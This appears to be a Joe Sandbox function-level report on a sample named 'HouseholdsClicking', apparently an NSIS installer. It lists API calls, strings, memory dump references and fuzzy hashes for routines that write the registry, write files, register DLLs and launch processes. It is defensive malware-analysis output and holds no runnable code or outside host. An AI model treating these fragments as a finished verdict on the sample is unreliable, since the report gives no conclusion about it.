Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010D8
FillRect.USER32(00000000,?,00000000), ref: 004010ED
DeleteObject.GDI32(?), ref: 004010F6
CreateFontIndirectW.GDI32(?), ref: 0040110E
SetBkMode.GDI32(00000000,00000001), ref: 0040112F
SetTextColor.GDI32(00000000,000000FF), ref: 00401139
SelectObject.GDI32(00000000,?), ref: 00401149
DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
SelectObject.GDI32(00000000,00000000), ref: 00401169
DeleteObject.GDI32(?), ref: 0040116E
EndPaint.USER32(?,?), ref: 00401177

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4

Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
RegCloseKey.ADVAPI32(?), ref: 004029E4

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
WriteReg: error creating key "%s\%s", xrefs: 004029F5

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID: lstrlen$CloseCreateValuewvsprintf
String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
API String ID: 1641139501-220328614
Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69

Function 00406113 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 72filestringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3

Strings

@bG, xrefs: 00406162
RMDir: RemoveDirectory invalid input(""), xrefs: 004061C1, 004061C6, 004061CD, 004061DC

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
String ID: @bG$RMDir: RemoveDirectory invalid input("")
API String ID: 3734993849-3206598305
Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC

Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
GlobalFree.KERNEL32(00000000), ref: 00402F17
CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
DeleteFileW.KERNEL32(?), ref: 00402F56

Strings

created uninstaller: %d, "%s", xrefs: 00402F3B

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID: created uninstaller: %d, "%s"
API String ID: 3294113728-3145124454
Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98

Function 004023F0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 83libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426979,74DF23A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426979,74DF23A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426979,74DF23A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
FreeLibrary.KERNEL32(?,?), ref: 004024C3

Strings

Error registering DLL: Could not initialize OLE, xrefs: 004024F1
Error registering DLL: %s not found in %s, xrefs: 0040249A
`G, xrefs: 0040246E
Error registering DLL: Could not load %s, xrefs: 004024DB

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
API String ID: 1033533793-4193110038
Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D

Function 00403DF6 Relevance: 12.1, APIs: 8, Instructions: 60COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00403E10
GetSysColor.USER32(00000000), ref: 00403E2C
SetTextColor.GDI32(?,00000000), ref: 00403E38
SetBkMode.GDI32(?,?), ref: 00403E44
GetSysColor.USER32(?), ref: 00403E57
SetBkColor.GDI32(?,?), ref: 00403E67
DeleteObject.GDI32(?), ref: 00403E81
CreateBrushIndirect.GDI32(?), ref: 00403E8B

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94

Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426979,74DF23A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426979,74DF23A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426979,74DF23A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D

WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2

Strings

Exec: command="%s", xrefs: 00402241
Exec: failed createprocess ("%s"), xrefs: 004022C2
Exec: success ("%s"), xrefs: 00402263

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
API String ID: 2014279497-3433828417
Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D

Function 0040487A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
GetMessagePos.USER32 ref: 0040489D
ScreenToClient.USER32(?,?), ref: 004048B5
SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED

Strings

f, xrefs: 004048C9

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4

Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
MulDiv.KERNEL32(0000F400,00000064,00100D29), ref: 00403295
wsprintfW.USER32 ref: 004032A5
SetWindowTextW.USER32(?,?), ref: 004032B5
SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7

Strings

verifying installer: %d%%, xrefs: 0040329F

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58

Function 00406064 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
CharNextW.USER32(?,?,?,00000000), ref: 004060D6
CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF

Strings

*?|<>/":, xrefs: 004060B6

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD

Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78COMMON

Download Yara Rule

APIs

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

GlobalFree.KERNEL32(00837B30), ref: 00402387

Strings

TournamentsDefenceBerry, xrefs: 00401EFB, 00401F00, 00401F1A
Exch: stack < %d elements, xrefs: 00401ED8
Pop: stack empty, xrefs: 00401F2C

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID: FreeGloballstrcpyn
String ID: Exch: stack < %d elements$Pop: stack empty$TournamentsDefenceBerry
API String ID: 1459762280-2197395026
Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D

Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
RegCloseKey.ADVAPI32(?), ref: 00401504
RegCloseKey.ADVAPI32(?), ref: 00401529
RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29

Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360

Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A

GlobalFree.KERNEL32(00837B30), ref: 00402387

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
